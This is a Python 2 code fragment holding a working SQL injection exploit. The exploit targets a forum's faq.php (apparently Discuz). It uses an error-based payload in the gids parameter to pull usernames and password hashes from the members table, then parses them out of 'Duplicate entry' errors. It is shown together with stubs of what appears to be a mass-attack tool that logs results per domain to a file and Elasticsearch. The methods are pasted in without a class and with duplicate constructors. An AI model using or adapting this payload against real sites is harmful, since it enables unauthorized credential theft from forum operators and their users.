def exploit(self, url, count=0):
self.initialize()
httptools = EXPHttp()
url = httptools.get_standard_url(url)
#拼接漏洞文件
if url[-1] != '/':
url = url + '/faq.php'
elif url[-1] == '/':
url = url + 'faq.php'
else:
pass
table_pre = self.__get_table_pre(url)
if not table_pre:
return None
para = "action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x20,password) from {table_pre}_members limit {start},1),floor(rand(0)*2))x from information_schema.tables group by x )a)%23".format(
table_pre=table_pre, start=count)
page_content = self.send_request(url, para)
if not page_content:
return None
pattern = re.compile(r"Duplicate entry '[0,1]?(.*?)[0,1]?'")
infos = pattern.findall(page_content)
if infos == []:
print 'Exploit Failed'
return None
else:
return infos[0].split(' ')
def __init__(self,exploit_file):
global file_name
self.exp = exploit_file
self.es = Elasticsearch('127.0.0.1:9200')
self.file = open(file_name,'a')
self.file.write('domain_list\t\t\tattack_results\n')
self.httptools = EXPHttp()
def __init__(self):
self.exp_module = None
self.keywords_module = None
self.httptools = EXPHttp()
